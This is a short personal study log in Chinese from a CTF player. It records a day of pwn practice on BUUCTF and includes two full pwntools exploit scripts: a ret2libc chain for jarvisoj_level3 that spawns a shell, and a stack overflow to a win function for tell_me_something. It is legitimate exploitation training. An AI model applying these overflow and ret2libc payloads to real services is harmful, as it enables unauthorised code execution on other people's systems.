21.07.21学习总结
Column: July 21, 2021
Tags: learning experience
前五天出去培训了, 累死累活的没时间学习其他东西, 好在薪资还可以…要不然亏大了
16:00-16:30: 给顾客pwn答疑以及做了两道题…(一个particular write, 一个格式化字符串)
23:30-24:00: buu刷题两道, 总算把第一页写完了
jarvisoj_level3:
很没意思的ret2libc, 而且libc给的还是踏马的错的, 建议使用libcsearcher
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#sh=process('./level3')
sh=remote('node4.buuoj.cn',29641)
elf=ELF('./level3')
libc=ELF('./libc-2.19.so')
#libc=elf.libc
context.log_level='debug'
vuln_addr=elf.sym['main']
ret_addr=0x80482da
#gdb.attach(sh)
sh.recv()
payload1='w'*140+p32(elf.plt['write'])+p32(vuln_addr)+p32(1)+p32(elf.got['read'])+p32(4)
sh.send(payload1)
read_addr=u32(sh.recv(4))
log.success('read addr: '+hex(read_addr))
libc_base=read_addr-libc.sym['read']
system_addr=libc_base+libc.sym['system']
binsh_addr=libc_base+libc.search('/bin/sh').next()
payload2=p32(ret_addr)*35+p32(system_addr)+p32(0x11111111)+p32(binsh_addr)
sh.send(payload2)
sh.interactive()
jarvisoj_tell_me_something:
胎儿级orw:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=process('./guestbook')
sh=remote('node4.buuoj.cn',28344)
#context.log_level='debug'
sh.recv()
sh.send('a'*0x88+p64(0x400620))
sh.recv()
sh.interactive()
明日目标:
buu刷题两道
强网杯2021线上EzCloud复现
ucore的lab1最起码做完execrise3